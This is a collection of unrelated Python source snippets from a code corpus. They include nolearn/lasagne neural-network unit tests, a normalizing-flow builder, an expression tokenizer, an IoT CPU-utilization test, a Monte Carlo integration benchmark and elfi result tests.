    Returns:
        SequenceINN: decoder network block
    """
    coder = Ff.SequenceINN(n_features, dim, dim)
    print("CNF coder:", n_features)
    # Each block: a random channel permutation followed by two affine
    # coupling layers, one with a 3x3 subnet and one with a 1x1 subnet.
    for _ in range(coupling_blocks):
        coder.append(
            Fm.PermuteRandom
        )
        coder.append(
            Fm.AllInOneBlock,
            subnet_constructor=subnet_conv3,
            affine_clamping=clamp_alpha,
            global_affine_type="SOFTPLUS",
        )
        coder.append(
            Fm.AllInOneBlock,
            subnet_constructor=subnet_conv1,
            affine_clamping=clamp_alpha,
            global_affine_type="SOFTPLUS",
        )
    return coder
| StarcoderdataPython |
6705170 | import pickle
from lasagne.layers import ConcatLayer
from lasagne.layers import DenseLayer
from lasagne.layers import InputLayer
from lasagne.layers import Layer
from lasagne.nonlinearities import identity
from lasagne.nonlinearities import softmax
from lasagne.objectives import categorical_crossentropy
from lasagne.updates import nesterov_momentum
from mock import Mock
from mock import patch
import numpy as np
import pytest
from sklearn.base import clone
from sklearn.datasets import make_classification
from sklearn.datasets import make_regression
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_absolute_error
import theano
import theano.tensor as T
floatX = theano.config.floatX
class TestLayers:
    """Tests for the ordered Layers mapping in nolearn.lasagne."""

    @pytest.fixture
    def layers(self):
        from nolearn.lasagne.base import Layers
        return Layers([('one', 1), ('two', 2), ('three', 3)])

    def test_getitem_with_key(self, layers):
        assert layers['one'] == 1

    def test_getitem_with_index(self, layers):
        # Layers supports positional access in insertion order.
        assert layers[0] == 1

    def test_getitem_with_slice(self, layers):
        from nolearn.lasagne.base import Layers
        sliced = layers[:2]
        # Slicing preserves the Layers type and ordering.
        assert isinstance(sliced, Layers)
        assert sliced.keys() == ['one', 'two']
        assert sliced.values() == [1, 2]

    def test_keys_returns_list(self, layers):
        assert layers.keys() == ['one', 'two', 'three']

    def test_values_returns_list(self, layers):
        assert layers.values() == [1, 2, 3]
class TestFunctionalToy:
    """Smoke tests: minimal single-layer nets on sklearn toy datasets."""

    def classif(self, NeuralNet, X, y):
        # Dense softmax layer directly on the input; one unit per class.
        l = InputLayer(shape=(None, X.shape[1]))
        l = DenseLayer(l, num_units=len(np.unique(y)), nonlinearity=softmax)
        net = NeuralNet(l, update_learning_rate=0.01)
        return net.fit(X, y)

    def regr(self, NeuralNet, X, y):
        # Linear output layer; one unit per regression target.
        l = InputLayer(shape=(None, X.shape[1]))
        l = DenseLayer(l, num_units=y.shape[1], nonlinearity=None)
        net = NeuralNet(l, regression=True, update_learning_rate=0.01)
        return net.fit(X, y)

    def test_classif_two_classes(self, NeuralNet):
        X, y = make_classification()
        X = X.astype(floatX)
        y = y.astype(np.int32)
        self.classif(NeuralNet, X, y)

    def test_classif_ten_classes(self, NeuralNet):
        X, y = make_classification(n_classes=10, n_informative=10)
        X = X.astype(floatX)
        y = y.astype(np.int32)
        self.classif(NeuralNet, X, y)

    def test_regr_one_target(self, NeuralNet):
        X, y = make_regression()
        X = X.astype(floatX)
        y = y.reshape(-1, 1).astype(np.float32)
        self.regr(NeuralNet, X, y)

    def test_regr_ten_targets(self, NeuralNet):
        X, y = make_regression(n_targets=10)
        X = X.astype(floatX)
        y = y.astype(floatX)
        self.regr(NeuralNet, X, y)
class TestFunctionalMNIST:
    """End-to-end tests against a fitted MNIST net (fixtures: net, net_fitted,
    mnist, X_train/X_test, y_train/y_pred supplied elsewhere)."""

    def test_accuracy(self, net_fitted, mnist, y_pred):
        X, y = mnist
        # MNIST convention: first 60000 samples train, the rest test.
        y_test = y[60000:]
        assert accuracy_score(y_pred, y_test) > 0.85

    def test_train_history(self, net_fitted):
        history = net_fitted.train_history_
        assert len(history) == 2  # due to early stopping
        assert history[1]['valid_accuracy'] > 0.85
        assert history[1]['valid_accuracy'] > history[0]['valid_accuracy']
        assert set(history[0].keys()) == set([
            'dur', 'epoch', 'train_loss', 'train_loss_best',
            'valid_loss', 'valid_loss_best', 'valid_accuracy',
            ])

    def test_early_stopping(self, net_fitted):
        # The early-stopping callback shares the net's history list.
        early_stopping = net_fitted.on_epoch_finished[0]
        assert early_stopping.train_history == net_fitted.train_history_

    def test_pickle(self, net_fitted, X_test, y_pred):
        # A pickle round-trip must preserve predictions exactly.
        pickled = pickle.dumps(net_fitted, -1)
        net_loaded = pickle.loads(pickled)
        assert np.array_equal(net_loaded.predict(X_test), y_pred)

    def test_load_params_from_net(self, net, net_fitted, X_test, y_pred):
        net_loaded = clone(net)
        net_loaded.load_params_from(net_fitted)
        assert np.array_equal(net_loaded.predict(X_test), y_pred)

    def test_load_params_from_params_values(self, net, net_fitted,
                                            X_test, y_pred):
        net_loaded = clone(net)
        net_loaded.load_params_from(net_fitted.get_all_params_values())
        assert np.array_equal(net_loaded.predict(X_test), y_pred)

    def test_save_params_to_path(self, net_fitted, X_test, y_pred):
        path = '/tmp/test_lasagne_functional_mnist.params'
        net_fitted.save_params_to(path)
        net_loaded = clone(net_fitted)
        net_loaded.load_params_from(path)
        assert np.array_equal(net_loaded.predict(X_test), y_pred)

    def test_load_params_from_message(self, net, net_fitted, capsys):
        # verbose=1 makes load_params_from report each layer it loads.
        net2 = clone(net)
        net2.verbose = 1
        net2.load_params_from(net_fitted)
        out = capsys.readouterr()[0]
        message = """\
Loaded parameters to layer 'conv1' (shape 8x1x5x5).
Loaded parameters to layer 'conv1' (shape 8).
Loaded parameters to layer 'conv2' (shape 8x8x5x5).
Loaded parameters to layer 'conv2' (shape 8).
Loaded parameters to layer 'hidden1' (shape 128x128).
Loaded parameters to layer 'hidden1' (shape 128).
Loaded parameters to layer 'output' (shape 128x10).
Loaded parameters to layer 'output' (shape 10).
"""
        assert out == message

    def test_partial_fit(self, net, X_train, y_train):
        net2 = clone(net)
        # partial_fit returns self and accumulates history across calls.
        assert net2.partial_fit(X_train, y_train) is net2
        net2.partial_fit(X_train, y_train)
        history = net2.train_history_
        assert len(history) == 2
        assert history[1]['valid_accuracy'] > 0.85
def test_lasagne_functional_grid_search(mnist, monkeypatch):
    # Make sure that we can satisfy the grid search interface.
    from nolearn.lasagne import NeuralNet

    nn = NeuralNet(
        layers=[],
        )

    param_grid = {
        'more_params': [{'hidden_num_units': 100}, {'hidden_num_units': 200}],
        'update_momentum': [0.9, 0.98],
        }
    X, y = mnist

    # Record the net's attribute dict at every (mocked) fit call so the
    # parameter combinations tried by GridSearchCV can be asserted below.
    vars_hist = []

    def fit(self, X, y):
        vars_hist.append(vars(self).copy())
        return self

    with patch.object(NeuralNet, 'fit', autospec=True) as mock_fit:
        mock_fit.side_effect = fit
        with patch('nolearn.lasagne.NeuralNet.score') as score:
            score.return_value = 0.3
            gs = GridSearchCV(nn, param_grid, cv=2, refit=False, verbose=4)
            gs.fit(X, y)

    # 8 fit calls in total: 2 momenta x 2 more_params x 2 CV folds.
    assert [entry['update_momentum'] for entry in vars_hist] == [
        0.9, 0.9, 0.98, 0.98] * 2
    assert [entry['more_params'] for entry in vars_hist] == (
        [{'hidden_num_units': 100}] * 4 +
        [{'hidden_num_units': 200}] * 4
        )
def test_clone():
    """sklearn.clone must produce a net whose get_params() matches the original."""
    from nolearn.lasagne import NeuralNet
    from nolearn.lasagne import BatchIterator
    from nolearn.lasagne import objective

    params = dict(
        layers=[
            ('input', InputLayer),
            ('hidden', DenseLayer),
            ('output', DenseLayer),
            ],
        input_shape=(100, 784),
        output_num_units=10,
        output_nonlinearity=softmax,

        more_params={
            'hidden_num_units': 100,
            },
        update=nesterov_momentum,
        update_learning_rate=0.01,
        update_momentum=0.9,

        regression=False,
        objective=objective,
        objective_loss_function=categorical_crossentropy,
        batch_iterator_train=BatchIterator(batch_size=100),
        y_tensor_type=T.ivector,
        use_label_encoder=False,
        on_epoch_finished=None,
        on_training_finished=None,
        max_epochs=100,
        eval_size=0.1,  # BBB
        verbose=0,
        )
    nn = NeuralNet(**params)
    nn2 = clone(nn)

    params1 = nn.get_params()
    params2 = nn2.get_params()

    # Entries that get_params() reports differently from what was passed in
    # (instances, callables, backwards-compatibility aliases) are removed
    # from all three dicts before comparing clone against original.
    for ignore in (
            'batch_iterator_train',
            'batch_iterator_test',
            'output_nonlinearity',
            'loss',
            'objective',
            'train_split',
            'eval_size',
            'X_tensor_type',
            'on_epoch_finished',
            'on_batch_finished',
            'on_training_started',
            'on_training_finished',
            'custom_score',
            ):
        for par in (params, params1, params2):
            par.pop(ignore, None)

    assert params == params1 == params2
def test_lasagne_functional_regression(boston):
    """A small regression net should reach MAE < 3.0 on held-out Boston data."""
    from nolearn.lasagne import NeuralNet

    X, y = boston

    input_layer = InputLayer(shape=(128, 13))
    hidden_layer = DenseLayer(input_layer, num_units=100)
    output_layer = DenseLayer(hidden_layer, num_units=1, nonlinearity=identity)

    net = NeuralNet(
        layers=output_layer,
        update_learning_rate=0.01,
        update_momentum=0.1,
        regression=True,
        max_epochs=50,
    )
    net.fit(X[:300], y[:300])
    predictions = net.predict(X[300:])
    assert mean_absolute_error(predictions, y[300:]) < 3.0
class TestDefaultObjective:
    """Unit tests for the default objective with lasagne's get_output mocked."""

    @pytest.fixture
    def get_output(self, monkeypatch):
        # Replace get_output so the objective can be exercised without
        # building a real network graph.
        from nolearn.lasagne import base
        get_output_mock = Mock()
        monkeypatch.setattr(base, 'get_output', get_output_mock)
        return get_output_mock

    @pytest.fixture
    def objective(self):
        from nolearn.lasagne.base import objective
        return objective

    def test_with_defaults(self, objective, get_output):
        loss_function, target = Mock(), Mock()
        # Per-sample losses [1, 2, 3] must be aggregated to their mean, 2.0.
        loss_function.return_value = np.array([1, 2, 3])
        result = objective(
            [1, 2, 3], loss_function=loss_function, target=target)
        assert result == 2.0
        # The last element of the layers argument is taken as the output layer.
        get_output.assert_called_with(3, deterministic=False)
        loss_function.assert_called_with(get_output.return_value, target)

    def test_with_get_output_kw(self, objective, get_output):
        loss_function, target = Mock(), Mock()
        loss_function.return_value = np.array([1, 2, 3])
        # Extra entries in get_output_kw are forwarded to get_output verbatim.
        objective(
            [1, 2, 3], loss_function=loss_function, target=target,
            get_output_kw={'i_was': 'here'},
            )
        get_output.assert_called_with(3, deterministic=False, i_was='here')
class TestTrainSplit:
    """Behaviour of the TrainSplit train/validation splitter."""

    @pytest.fixture
    def TrainSplit(self):
        from nolearn.lasagne import TrainSplit
        return TrainSplit

    def test_reproducable(self, TrainSplit, nn):
        # Two independent splitters with the same eval_size must produce
        # the same partition of the data.
        X, y = np.random.random((100, 10)), np.repeat([0, 1, 2, 3], 25)
        X_train1, X_valid1, y_train1, y_valid1 = TrainSplit(0.2)(
            X, y, nn)
        X_train2, X_valid2, y_train2, y_valid2 = TrainSplit(0.2)(
            X, y, nn)
        assert np.all(X_train1 == X_train2)
        assert np.all(y_valid1 == y_valid2)

    def test_eval_size_zero(self, TrainSplit, nn):
        # eval_size 0.0 keeps everything in the training set.
        X, y = np.random.random((100, 10)), np.repeat([0, 1, 2, 3], 25)
        X_train, X_valid, y_train, y_valid = TrainSplit(0.0)(
            X, y, nn)
        assert len(X_train) == len(X)
        assert len(y_train) == len(y)
        assert len(X_valid) == 0
        assert len(y_valid) == 0

    def test_eval_size_half(self, TrainSplit, nn):
        # A fractional eval_size need not split exactly, but the pieces
        # must still partition the data.
        X, y = np.random.random((100, 10)), np.repeat([0, 1, 2, 3], 25)
        X_train, X_valid, y_train, y_valid = TrainSplit(0.51)(
            X, y, nn)
        assert len(X_train) + len(X_valid) == 100
        assert len(y_train) + len(y_valid) == 100
        assert len(X_train) > 45

    def test_regression(self, TrainSplit, nn):
        X = np.random.random((100, 10))
        y = np.random.random((100))
        nn.regression = True
        X_train, X_valid, y_train, y_valid = TrainSplit(0.2)(
            X, y, nn)
        assert len(X_train) == len(y_train) == 80
        assert len(X_valid) == len(y_valid) == 20

    def test_stratified(self, TrainSplit, nn):
        # With stratification the 25 positive labels are split 80/20
        # between training and validation sets.
        X = np.random.random((100, 10))
        y = np.hstack([np.repeat([0, 0, 0], 25), np.repeat([1], 25)])
        X_train, X_valid, y_train, y_valid = TrainSplit(0.2)(
            X, y, nn)
        assert y_train.sum() == 0.8 * 25
        assert y_valid.sum() == 0.2 * 25

    def test_not_stratified(self, TrainSplit, nn):
        # Without stratification all 25 positives end up in the training set.
        X = np.random.random((100, 10))
        y = np.hstack([np.repeat([0, 0, 0], 25), np.repeat([1], 25)])
        X_train, X_valid, y_train, y_valid = TrainSplit(0.2, stratify=False)(
            X, y, nn)
        assert y_train.sum() == 25
        assert y_valid.sum() == 0

    def test_X_is_dict(self, TrainSplit, nn):
        # Dict-valued X (multi-input nets) is split entry-wise.
        X = {
            '1': np.random.random((100, 10)),
            '2': np.random.random((100, 10)),
            }
        y = np.repeat([0, 1, 2, 3], 25)
        X_train, X_valid, y_train, y_valid = TrainSplit(0.2)(
            X, y, nn)
        assert len(X_train['1']) == len(X_train['2']) == len(y_train) == 80
        assert len(X_valid['1']) == len(X_valid['2']) == len(y_valid) == 20

    def test_X_is_dict_eval_size_0(self, TrainSplit, nn):
        X = {
            '1': np.random.random((100, 10)),
            '2': np.random.random((100, 10)),
            }
        y = np.repeat([0, 1, 2, 3], 25)
        X_train, X_valid, y_train, y_valid = TrainSplit(0)(
            X, y, nn)
        assert len(X_train['1']) == len(X_train['2']) == len(y_train) == 100
        assert len(X_valid['1']) == len(X_valid['2']) == len(y_valid) == 0
class TestTrainTestSplitBackwardCompatibility:
    """BBB tests: the deprecated train_test_split/eval_size API still works."""

    @pytest.fixture
    def LegacyNet(self, NeuralNet):
        class LegacyNet(NeuralNet):
            # Old-style override; records its arguments for the assertions below.
            def train_test_split(self, X, y, eval_size):
                self.__call_args__ = (X, y, eval_size)
                split = int(X.shape[0] * eval_size)
                return X[:split], X[split:], y[:split], y[split:]
        return LegacyNet

    def test_legacy_eval_size(self, NeuralNet):
        # A legacy eval_size kwarg is forwarded to the modern train_split.
        net = NeuralNet([], eval_size=0.3, max_epochs=0)
        assert net.train_split.eval_size == 0.3

    def test_legacy_method_default_eval_size(self, LegacyNet):
        # An overridden train_test_split is still called, with the default 0.2.
        net = LegacyNet([], max_epochs=0)
        X, y = np.ones((10, 3)), np.zeros(10)
        net.train_loop(X, y)
        assert net.__call_args__ == (X, y, 0.2)

    def test_legacy_method_given_eval_size(self, LegacyNet):
        # ...and with an explicitly configured eval_size.
        net = LegacyNet([], eval_size=0.3, max_epochs=0)
        X, y = np.ones((10, 3)), np.zeros(10)
        net.train_loop(X, y)
        assert net.__call_args__ == (X, y, 0.3)
class TestCheckForUnusedKwargs:
    """initialize() must reject kwargs that match no layer or update parameter."""

    def test_okay(self, NeuralNet):
        # Every extra kwarg maps to a known layer name or to update_*.
        net = NeuralNet(
            layers=[('input', Mock), ('mylayer', Mock)],
            input_shape=(10, 10),
            mylayer_hey='hey',
            update_foo=1,
            update_bar=2,
            )
        # Stub out compiled-function creation; it is irrelevant here.
        net._create_iter_funcs = lambda *args: (1, 2, 3)
        net.initialize()

    def test_unused(self, NeuralNet):
        # 'yourlayer_ho' matches no layer, so initialize() must raise.
        net = NeuralNet(
            layers=[('input', Mock), ('mylayer', Mock)],
            input_shape=(10, 10),
            mylayer_hey='hey',
            yourlayer_ho='ho',
            update_foo=1,
            update_bar=2,
            )
        net._create_iter_funcs = lambda *args: (1, 2, 3)
        with pytest.raises(ValueError) as err:
            net.initialize()
        assert str(err.value) == 'Unused kwarg: yourlayer_ho'
class TestInitializeLayers:
    """Tests for NeuralNet.initialize_layers and the supported layer-spec formats."""

    def test_initialization_with_layer_instance(self, NeuralNet):
        layer1 = InputLayer(shape=(128, 13))  # name will be assigned
        layer2 = DenseLayer(layer1, name='output', num_units=2)  # has name
        nn = NeuralNet(layers=layer2)
        out = nn.initialize_layers()
        assert nn.layers_['output'] == layer2 == out
        # The unnamed input layer receives an auto-generated name.
        assert nn.layers_['input0'] == layer1

    def test_initialization_with_layer_instance_bad_params(self, NeuralNet):
        # Prefixed kwargs that match no layer name must be rejected.
        layer = DenseLayer(InputLayer(shape=(128, 13)), num_units=2)
        nn = NeuralNet(layers=layer, dense1_num_units=3)
        with pytest.raises(ValueError):
            nn.initialize_layers()

    def test_initialization_with_tuples(self, NeuralNet):
        input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
        hidden1, hidden2, output = [
            Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(3)]
        nn = NeuralNet(
            layers=[
                (input, {'shape': (10, 10), 'name': 'input'}),
                (hidden1, {'some': 'param', 'another': 'param'}),
                (hidden2, {}),
                (output, {'name': 'output'}),
                ],
            input_shape=(10, 10),
            # 'mock1' is the auto-generated name for hidden1; this kwarg
            # must override the 'some' entry given in the tuple spec.
            mock1_some='iwin',
            )
        out = nn.initialize_layers(nn.layers)

        input.assert_called_with(
            name='input', shape=(10, 10))
        assert nn.layers_['input'] is input.return_value

        hidden1.assert_called_with(
            incoming=input.return_value, name='mock1',
            some='iwin', another='param')
        assert nn.layers_['mock1'] is hidden1.return_value

        hidden2.assert_called_with(
            incoming=hidden1.return_value, name='mock2')
        assert nn.layers_['mock2'] is hidden2.return_value

        output.assert_called_with(
            incoming=hidden2.return_value, name='output')

        assert out is nn.layers_['output']

    def test_initialization_legacy(self, NeuralNet):
        # Old-style (name, layer_class) tuple specs.
        input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
        hidden1, hidden2, output = [
            Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(3)]
        nn = NeuralNet(
            layers=[
                ('input', input),
                ('hidden1', hidden1),
                ('hidden2', hidden2),
                ('output', output),
                ],
            input_shape=(10, 10),
            hidden1_some='param',
            )
        out = nn.initialize_layers(nn.layers)

        input.assert_called_with(
            name='input', shape=(10, 10))
        assert nn.layers_['input'] is input.return_value

        hidden1.assert_called_with(
            incoming=input.return_value, name='hidden1', some='param')
        assert nn.layers_['hidden1'] is hidden1.return_value

        hidden2.assert_called_with(
            incoming=hidden1.return_value, name='hidden2')
        assert nn.layers_['hidden2'] is hidden2.return_value

        output.assert_called_with(
            incoming=hidden2.return_value, name='output')

        assert out is nn.layers_['output']

    def test_initialization_legacy_with_unicode_names(self, NeuralNet):
        # Test whether legacy initialization is triggered; if not,
        # raises error.
        input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
        hidden1, hidden2, output = [
            Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(3)]
        nn = NeuralNet(
            layers=[
                (u'input', input),
                (u'hidden1', hidden1),
                (u'hidden2', hidden2),
                (u'output', output),
                ],
            input_shape=(10, 10),
            hidden1_some='param',
            )
        nn.initialize_layers()

    def test_diamond(self, NeuralNet):
        # Diamond topology: hidden1 and hidden2 both branch off the input
        # and are merged again by the concat layer.
        input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
        hidden1, hidden2, concat, output = [
            Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(4)]
        nn = NeuralNet(
            layers=[
                ('input', input),
                ('hidden1', hidden1),
                ('hidden2', hidden2),
                ('concat', concat),
                ('output', output),
                ],
            input_shape=(10, 10),
            hidden2_incoming='input',
            concat_incomings=['hidden1', 'hidden2'],
            )
        nn.initialize_layers(nn.layers)

        input.assert_called_with(name='input', shape=(10, 10))
        hidden1.assert_called_with(incoming=input.return_value, name='hidden1')
        hidden2.assert_called_with(incoming=input.return_value, name='hidden2')
        concat.assert_called_with(
            incomings=[hidden1.return_value, hidden2.return_value],
            name='concat'
            )
        output.assert_called_with(incoming=concat.return_value, name='output')
class TestCheckGoodInput:
    """Input validation and normalization done by NeuralNet._check_good_input."""

    @pytest.fixture
    def check_good_input(self, nn):
        return nn._check_good_input

    @pytest.fixture
    def X(self):
        return np.arange(100).reshape(10, 10).astype(floatX)

    @pytest.fixture
    def y(self):
        return np.arange(10).astype(np.int32)

    @pytest.fixture
    def y_regr(self):
        # Regression targets as an (n, 1) column vector.
        return np.arange(10).reshape(-1, 1).astype(floatX)

    def test_X_OK(self, check_good_input, X):
        assert check_good_input(X) == (X, None)

    def test_X_and_y_OK(self, check_good_input, X, y):
        assert check_good_input(X, y) == (X, y)

    def test_X_and_y_OK_regression(self, nn, check_good_input, X, y_regr):
        nn.regression = True
        assert check_good_input(X, y_regr) == (X, y_regr)

    def test_X_and_y_length_mismatch(self, check_good_input, X, y):
        with pytest.raises(ValueError):
            check_good_input(
                X[:9],
                y
                )

    def test_X_dict_and_y_length_mismatch(self, check_good_input, X, y):
        # A dict-valued X must agree in length with y, too.
        with pytest.raises(ValueError):
            check_good_input(
                {'one': X, 'two': X},
                y[:9],
                )

    def test_X_dict_length_mismatch(self, check_good_input, X):
        # All entries of a dict-valued X must have the same length.
        with pytest.raises(ValueError):
            check_good_input({
                'one': X,
                'two': X[:9],
                })

    def test_y_regression_1dim(self, nn, check_good_input, X, y_regr):
        # 1-d regression targets are reshaped into a single column.
        y = y_regr.reshape(-1)
        nn.regression = True
        X1, y1 = check_good_input(X, y)
        assert (X1 == X).all()
        assert (y1 == y.reshape(-1, 1)).all()

    def test_y_regression_2dim(self, nn, check_good_input, X, y_regr):
        # Already-2d regression targets pass through unchanged.
        y = y_regr
        nn.regression = True
        X1, y1 = check_good_input(X, y)
        assert (X1 == X).all()
        assert (y1 == y).all()
class TestMultiInputFunctional:
    """Fit/predict with two InputLayers fed from a dict of arrays."""

    @pytest.fixture(scope='session')
    def net(self, NeuralNet):
        # Each input branch receives one 392-column half of a flattened
        # 784-feature MNIST image; the branches are merged by ConcatLayer.
        return NeuralNet(
            layers=[
                (InputLayer,
                 {'name': 'input1', 'shape': (None, 392)}),
                (DenseLayer,
                 {'name': 'hidden1', 'num_units': 98}),
                (InputLayer,
                 {'name': 'input2', 'shape': (None, 392)}),
                (DenseLayer,
                 {'name': 'hidden2', 'num_units': 98}),
                (ConcatLayer,
                 {'incomings': ['hidden1', 'hidden2']}),
                (DenseLayer,
                 {'name': 'hidden3', 'num_units': 98}),
                (DenseLayer,
                 {'name': 'output', 'num_units': 10, 'nonlinearity': softmax}),
                ],
            update=nesterov_momentum,
            update_learning_rate=0.01,
            update_momentum=0.9,

            max_epochs=2,
            verbose=4,
            )

    @pytest.fixture(scope='session')
    def net_fitted(self, net, mnist):
        X, y = mnist
        X_train, y_train = X[:10000], y[:10000]
        # Split each sample into two 392-column halves, one per input branch.
        X_train1, X_train2 = X_train[:, :392], X_train[:, 392:]
        return net.fit({'input1': X_train1, 'input2': X_train2}, y_train)

    @pytest.fixture(scope='session')
    def y_pred(self, net_fitted, mnist):
        X, y = mnist
        X_test = X[60000:]
        X_test1, X_test2 = X_test[:, :392], X_test[:, 392:]
        return net_fitted.predict({'input1': X_test1, 'input2': X_test2})

    def test_accuracy(self, net_fitted, mnist, y_pred):
        X, y = mnist
        y_test = y[60000:]
        assert accuracy_score(y_pred, y_test) > 0.85
| StarcoderdataPython |
from dataclasses import dataclass
from enum import Enum
from typing import Any
class TokenType(Enum):
    """Kinds of tokens produced by the expression tokenizer."""

    NUM = 0                   # numeric literal
    VAR = 1                   # variable identifier
    PLUS = 2                  # addition operator
    MINUS = 3                 # subtraction (or negation) operator
    MULTIPLY = 4              # multiplication operator
    DIVIDE = 5                # division operator
    POWER = 6                 # exponentiation operator
    LEFT_PARENTHESES = 7      # opening parenthesis
    RIGHT_PARENTHESES = 8     # closing parenthesis
@dataclass
class Token:
    """A single token: a ``TokenType`` tag plus an optional literal value.

    ``value`` is only meaningful for value-carrying tokens (numbers,
    variables); operator and parenthesis tokens leave it as ``None``.
    """

    type: TokenType
    value: Any = None  # was annotated with the builtin `any`; `Any` is the correct type

    def __repr__(self):
        # Append the value part only when a value is present.  Use
        # `is not None` (identity, per PEP 8) rather than `!= None`,
        # which invokes __eq__ and misbehaves for objects overriding it.
        return self.type.name + (f": {self.value}" if self.value is not None else "")
| StarcoderdataPython |
4846625 | <filename>3d/linear_waves_flat_3D/linear_waves_flat_3D_01_GAZ/tank_batch.py
# Batch script, presumably executed by the Proteus batch driver, which
# provides ``simFlagsList`` and interprets the bare ``start``/``quit``
# commands below -- confirm against the driver's expected syntax.
# Store the solid-phase quantities ('phi_solid', 'velocity_solid') for
# post-processing.
simFlagsList[0]['storeQuantities']= ["q:'phi_solid'","q:'velocity_solid'"]
#simFlagsList[0]['storeQuantities']= ["q:velocity_solid"]
# Run the simulation, then leave the batch interpreter.
start
quit
| StarcoderdataPython |
3409508 | <reponame>Nitinsd96/Air-Pollution-Monitoring-System<gh_stars>0
#####
#
# This class is part of the Programming the Internet of Things
# project, and is available via the MIT License, which can be
# found in the LICENSE file at the top level of this repository.
#
# Copyright (c) 2020 by <NAME>
#
import logging
import unittest
from programmingtheiot.cda.system.SystemCpuUtilTask import SystemCpuUtilTask
class SystemCpuUtilTaskTest(unittest.TestCase):
    """
    This test case class contains very basic unit tests for
    SystemCpuUtilTask. It should not be considered complete,
    but serve as a starting point for the student implementing
    additional functionality within their Programming the IoT
    environment.
    """

    @classmethod
    def setUpClass(self):
        # Configure logging once for the whole test case and create the
        # single task instance shared by all tests.
        logging.basicConfig(format = '%(asctime)s:%(module)s:%(levelname)s:%(message)s', level = logging.DEBUG)
        logging.info("Testing SystemCpuUtilTask class...")
        self.cpuUtilTask = SystemCpuUtilTask()

    def setUp(self):
        # No per-test setup required.
        pass

    def tearDown(self):
        # No per-test teardown required.
        pass

    @unittest.skip("Ignore for now.")
    def testGenerateTelemetry(self):
        # Generated telemetry should be a non-None SensorData with a
        # non-negative value.
        sd = self.cpuUtilTask.generateTelemetry()
        self.assertIsNotNone(sd)
        self.assertGreaterEqual(sd.getValue(), 0.0)
        logging.info("CPU utilization SensorData: %s", str(sd))

    def testGetTelemetryValue(self):
        # The raw telemetry value should never be negative.
        val = self.cpuUtilTask.getTelemetryValue()
        self.assertGreaterEqual(val, 0.0)
        logging.info("CPU utilization: %s", str(val))
# Allow running this test module directly with the unittest runner.
if __name__ == "__main__":
    unittest.main()
| StarcoderdataPython |
4895688 | <reponame>casutton/bayes-qnet
#!/usr/bin/python
# Benchmark script (Python 2 syntax: xrange, print statements).  Compares
# the project's Monte Carlo integrator (misc.mcint) against scipy's quad,
# reporting throughput and the spread of the Monte Carlo estimates.

from scipy.optimize import *
from scipy.integrate import *

import distributions
import misc
import mytime
import numpy

# Integrand: log-pdf of a standard LogNormal, integrated over [0, 3].
ln = distributions.LogNormal (0, 1)

N = 100

# Time N Monte Carlo integrations and collect the individual estimates.
tmr = mytime.timeit()
allint = []
for i in xrange(N):
    allint.append (misc.mcint (ln.lpdf, 0, 3))
    elapsed = tmr.total("Time for %d integrations" % N)

print "Integrations per second = %.4f" % (N / elapsed)
print "Integrals: mean %.4f sd %.4f" % (numpy.mean(allint), numpy.std(allint))
# Reference value from scipy's adaptive quadrature.
print "From quad:", quad(ln.lpdf, 0, 3)

# Second pass: time scipy's quad on a shifted LogNormal.
# NOTE(review): source indentation was lost; it is ambiguous whether the
# "integral was" print (and tmr.total above) sit inside or after their
# loops -- confirm against the original repository before relying on this.
ln2 = distributions.LogNormal (-3.75, 1)
N = 10000
tmr = mytime.timeit()
for i in xrange(N):
    integral = quad (ln2.lpdf, 0, 3)
    print "integral was %.10f" % integral[0]
elapsed = tmr.total("Time for %d integrations" % N)
print "Integrations per second = %.4f" % (N / elapsed)
| StarcoderdataPython |
3418605 | from textwrap import dedent
from flake8_plugin_utils import assert_error, assert_not_error
from {{cookiecutter.project_slug}}.errors import {{cookiecutter.error_name}}Error
from {{cookiecutter.project_slug}}.visitor import {{cookiecutter.plugin_name}}Visitor
def test_error():
    # NOTE: this module is a cookiecutter template; the {{...}} placeholders
    # are substituted when a new flake8-plugin project is generated, and the
    # empty code snippet is meant to be filled in with offending source.
    code = dedent(
        """
        """
    )
    # The generated visitor must report the generated error for `code`.
    assert_error(
        {{cookiecutter.plugin_name}}Visitor, code, {{cookiecutter.error_name}}Error
    )
def test_no_error():
    # Counterpart template test: the generated visitor must stay silent on
    # conforming code (snippet to be filled in by the plugin author).
    code = dedent(
        """
        """
    )
    assert_not_error({{cookiecutter.plugin_name}}Visitor, code)
| StarcoderdataPython |
62722 | <gh_stars>100-1000
import numpy as np
import pytest
import elfi
def test_sample():
    """A Sample result exposes its draws, metadata and extra kwargs."""
    n_samples = 10
    parameter_names = ['a', 'b']
    distance_name = 'dist'

    draws = [np.random.random(n_samples) for _ in range(3)]
    outputs = dict(zip(parameter_names + [distance_name], draws))

    sample = elfi.methods.results.Sample(
        method_name="TestRes",
        outputs=outputs,
        parameter_names=parameter_names,
        discrepancy_name=distance_name,
        something='x',
        something_else='y',
        n_sim=0, )

    assert sample.method_name == "TestRes"
    assert hasattr(sample, 'samples')
    assert sample.n_samples == n_samples
    assert sample.dim == len(parameter_names)
    assert not sample.is_multivariate

    # Parameter columns and discrepancies must round-trip unchanged.
    assert np.allclose(draws[0], sample.samples_array[:, 0])
    assert np.allclose(draws[1], sample.samples_array[:, 1])
    assert np.allclose(draws[-1], sample.discrepancies)

    # Extra keyword arguments become attributes.
    assert hasattr(sample, 'something')
    assert sample.something_else == 'y'

    with pytest.raises(AttributeError):
        sample.not_here

    # Summary printing should run without raising.
    sample.summary()
def test_bolfi_sample():
    """BolfiSample merges per-chain draws, discarding warmup iterations."""
    n_chains = 3
    n_iters = 10
    warmup = 5
    parameter_names = ['a', 'b']

    chains = np.random.random((n_chains, n_iters, len(parameter_names)))

    result = elfi.methods.results.BolfiSample(
        method_name="TestRes",
        chains=chains,
        parameter_names=parameter_names,
        warmup=warmup,
        something='x',
        something_else='y',
        n_sim=0, )

    assert result.method_name == "TestRes"
    assert hasattr(result, 'samples')
    assert hasattr(result, 'chains')
    assert hasattr(result, 'outputs')
    assert result.n_samples == n_chains * (n_iters - warmup)
    assert result.dim == len(parameter_names)
